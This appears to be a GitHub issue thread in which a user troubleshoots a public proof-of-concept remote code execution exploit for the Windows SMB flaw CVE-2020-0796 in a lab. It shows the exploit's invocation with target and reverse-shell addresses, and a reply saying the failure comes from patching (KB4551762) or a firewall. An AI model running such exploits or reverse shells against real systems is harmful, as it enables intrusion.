jamf
Target is not vulnerable and Target VM is Windows 10 Pro version: 1909
Hi,
I have encounter an issue when running the SMBleedingGhost.py script and the issue message is -> Target is not vulnerable.
I have followed the instructions in the readme.md and i ran the 2 scripts in the following sequential ways.
1/ Run calc_target_offsets.bat on the Target VM (Windows 10 Pro - version 1909) and obtain the offset values.
2/ Amend the SMBleedingGhost.py script (after obtained the offset values from the target VM) and modify the offset value in the SMBleedingGhost.py script.
3/ Run the SMBleedingGhost.py with the necessary parameters and below is the command output after executed:
root@attackerpc:/home/labadmin/Desktop/CVE-2020-0796-RCE-POC-master# python3.8 SMBleedingGhost.py 192.168.75.128 (target IP) 192.168.75.129 (reverse shell IP) 4444 (reverse port number) CVE-2020-0796 Remote Code Execution POC (c) 2020 ZecOps, Inc.
Target is not vulnerable root@attackerpc:/home/labadmin/Desktop/CVE-2020-0796-RCE-POC-master#
My Windows 10 VM information:
vRAM : 4GB Number of Processors : 1 Number of cores per Processors : 1 OS information : Windows 10 Pro Version 1909 (OS Build 18363.900)
Please help and advise why this is happening. In addition, i have a scan results to determine that my Windows 10 VM is vulnerable to the vulnerability. Let me know if you need the scan results.
Thank you
Hi,
The "Target is not vulnerable" message means that the target discards a simple packet which triggers the bug, either because it's patched, or because of something else, such as a firewall. Make sure that the the system is not patched (update KB4551762 or newer must not be installed) and that nothing else interferes the network connection.
